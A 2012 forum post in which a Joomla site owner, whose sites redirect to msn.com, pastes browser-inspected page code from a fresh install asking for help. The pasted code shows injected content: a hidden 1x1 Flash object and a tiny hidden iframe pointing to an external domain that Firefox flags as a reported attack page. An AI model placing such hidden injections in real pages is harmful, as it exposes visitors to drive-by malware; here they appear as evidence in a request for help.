odd code in new installation of Joomla 2.5.7
Posted: Wed Oct 17, 2012 5:26 pm
I have several folders with both Joomla 1.5 and 2.5 sites, all using the latest version, on a shared server.My sites keep redirecting to msn.com, both the url for the front end or backend.I removed all files except the log file from the "root" and all the sites are in folders. If it is a live site, the url points directly to it. If it is a site I am still working on, I access it with the sub-domain and the name of the folder. I restored 2 of the sites because I had backups for them, so I just created a new database and folder and restored them. I will change the admin and password and add admin tools, which I hadn't done (and learned my lesson).
I do have one site that I have been working on and had not backed up yet (stupid, I know). I uploaded a clean htaccess file so I don't think the code is in there. So I will probably have to rebuild it from scratch. So I did a fresh installation of Joomla 2.5.7 with a new database in a new folder, and I noticed a strange thing. At the very top of the browser there a some small black squares right above the admin panel on the back end and at the top of the page on the front end. When I use firebug, I see the following, and it just doesn't seem right. . This is a new install without sample data.
Is this normal? Do you think it is related to the redirect? Where is it coming from?How can I fix this?
The new install is http://s285641334.onlinehome.us/olio2/
The site that redirects to msn.com is http://s285641334.onlinehome.us/olio/
Someone please help!!!
Ellen
I do have one site that I have been working on and had not backed up yet (stupid, I know). I uploaded a clean htaccess file so I don't think the code is in there. So I will probably have to rebuild it from scratch. So I did a fresh installation of Joomla 2.5.7 with a new database in a new folder, and I noticed a strange thing. At the very top of the browser there a some small black squares right above the admin panel on the back end and at the top of the page on the front end. When I use firebug, I see the following, and it just doesn't seem right. . This is a new install without sample data.
Code: Select all
[size=85][size=85]!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-gb" dir="ltr" xml:lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" slick-uniqueid="3">
<head>
<body style="font-size: 100%;">
<div id="_GPL_e6a00_parent_div" style="position: absolute; top: 0px; left: 0px; width: 1px; height: 1px; z-index: 2147483647;">
<object id="_GPL_e6a00_swf" width="1" height="1" type="application/x-shockwave-flash" data="http://savingsslider-a.akamaihd.net/items/e6a00/storage.swf">
<param name="wmode" value="transparent">
<param name="allowscriptaccess" value="always">
<param name="flashvars" value="logfn=_GPL.items.e6a00.log&onload=_GPL.items.e6a00.onload&onerror=_GPL.items.e6a00.onerror&LSOName=gpl">
</object>
</div>
<iframe width="5" scrolling="auto" height="5" align="middle" frameborder="no" src="http://polarizebit.org/Lexmark?8">
<!DOCTYPE html>
<html class="blacklist" xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" href="chrome://global/skin/netError.css" type="text/css" media="all">
Filtered chrome url chrome://global/skin/netError.css
</link>
<link id="favicon" rel="icon" type="image/png" href="chrome://global/skin/icons/blacklist_favicon.png"/>
<script type="application/javascript">
// Error url MUST be formatted like this:
// about:blocked?e=error_code&u=url
// Note that this file uses document.documentURI to get
// the URL (with the format from above). This is because
// document.location.href gets the current URI off the docshell,
// which is the URL displayed in the location bar, i.e.
// the URI that the user attempted to load.
function getErrorCode()
{
var url = document.documentURI;
var error = url.search(/e\=/);
var duffUrl = url.search(/\&u\=/);
return decodeURIComponent(url.slice(error + 2, duffUrl));
}
function getURL()
{
var url = document.documentURI;
var match = url.match(/&u=([^&]+)&/);
// match == null if not found; if so, return an empty string
// instead of what would turn out to be portions of the URI
if (!match)
return "";
url = decodeURIComponent(match[1]);
// If this is a view-source page, then get then real URI of the page
if (/^view-source\:/.test(url))
url = url.slice(12);
return url;
}
/**
* Attempt to get the hostname via document.location. Fail back
* to getURL so that we always return something meaningful.
*/
function getHostString()
{
try {
return document.location.hostname;
} catch (e) {
return getURL();
}
}
function initPage()
{
// Handoff to the appropriate initializer, based on error code
switch (getErrorCode()) {
case "malwareBlocked" :
initPage_malware();
break;
case "phishingBlocked" :
initPage_phishing();
break;
}
}
/**
* Initialize custom strings and functionality for blocked malware case
*/
function initPage_malware()
{
// Remove phishing strings
var el = document.getElementById("errorTitleText_phishing");
el.parentNode.removeChild(el);
el = document.getElementById("errorShortDescText_phishing");
el.parentNode.removeChild(el);
el = document.getElementById("errorLongDescText_phishing");
el.parentNode.removeChild(el);
// Set sitename
document.getElementById("malware_sitename").textContent = getHostString();
document.title = document.getElementById("errorTitleText_malware")
.innerHTML;
}
/**
* Initialize custom strings and functionality for blocked phishing case
*/
function initPage_phishing()
{
// Remove malware strings
var el = document.getElementById("errorTitleText_malware");
el.parentNode.removeChild(el);
el = document.getElementById("errorShortDescText_malware");
el.parentNode.removeChild(el);
el = document.getElementById("errorLongDescText_malware");
el.parentNode.removeChild(el);
// Set sitename
document.getElementById("phishing_sitename").textContent = getHostString();
document.title = document.getElementById("errorTitleText_phishing")
.innerHTML;
}
</script>
<style type="text/css">
/* Style warning button to look like a small text link in the
bottom right. This is preferable to just using a text link
since there is already a mechanism in browser.js for trapping
oncommand events from unprivileged chrome pages (BrowserOnCommand).*/
#ignoreWarningButton {
-moz-appearance: none;
background: transparent;
border: none;
color: white; /* Hard coded because netError.css forces this page's background to dark red */
text-decoration: underline;
margin: 0;
padding: 0;
position: relative;
top: 23px;
left: 20px;
font-size: smaller;
}
#ignoreWarning {
text-align: right;
}
</style>
<title>Reported Attack Page!</title>
</head>
<body dir="ltr">
<div id="errorPageContainer">
<div id="errorTitle">
<h1 id="errorTitleText_malware">Reported Attack Page!</h1>
</div>
<div id="errorLongContent">
<div id="errorShortDesc">
<div id="errorLongDesc">
<div id="buttons">
</div>
<div id="ignoreWarning">
</div>
<script type="application/javascript">
</body>
</html>
</iframe>[/size][/size]Is this normal? Do you think it is related to the redirect? Where is it coming from?How can I fix this?
The new install is http://s285641334.onlinehome.us/olio2/
The site that redirects to msn.com is http://s285641334.onlinehome.us/olio/
Someone please help!!!
Ellen